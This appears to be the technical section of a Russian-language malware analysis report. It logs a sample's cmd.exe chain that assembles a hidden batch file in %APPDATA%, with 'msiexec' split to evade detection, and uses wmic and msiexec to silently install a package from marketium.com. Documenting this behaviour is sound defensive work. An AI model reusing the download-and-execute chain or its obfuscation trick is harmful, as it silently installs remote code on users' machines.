Техническая информация
- '<SYSTEM32>\cmd.exe' /c echo|set /p="wmic process call create 'm">%appdata%\LaQcJFq.bat&echo|set /p="siexec /i https://marketium.com/wp-configs.php /q'" >> %appdata%\LaQcJFq.bat&%appdata%\LaQcJFq.bat>%appdata%\LaQ...
- %APPDATA%\laqcjfq.bat
- %APPDATA%\laqcjfq.log
- 'ma###tium.com':443
- DNS ASK ma###tium.com
- '<SYSTEM32>\cmd.exe' /c echo|set /p="wmic process call create 'm">%appdata%\LaQcJFq.bat&echo|set /p="siexec /i https://marketium.com/wp-configs.php /q'" >> %appdata%\LaQcJFq.bat&%appdata%\LaQcJFq.bat>%appdata%\LaQ...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /S /D /c" echo"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="wmic process call create 'm" 1>%APPDATA%\LaQcJFq.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="siexec /i https://marketium.com/wp-configs.php /q'" 1>>%APPDATA%\LaQcJFq.bat"
- '<SYSTEM32>\wbem\wmic.exe' process call create 'msiexec /i https://marketium.com/wp-configs.php /q'
- '<SYSTEM32>\msiexec.exe' /i https://marketium.com/wp-configs.php /q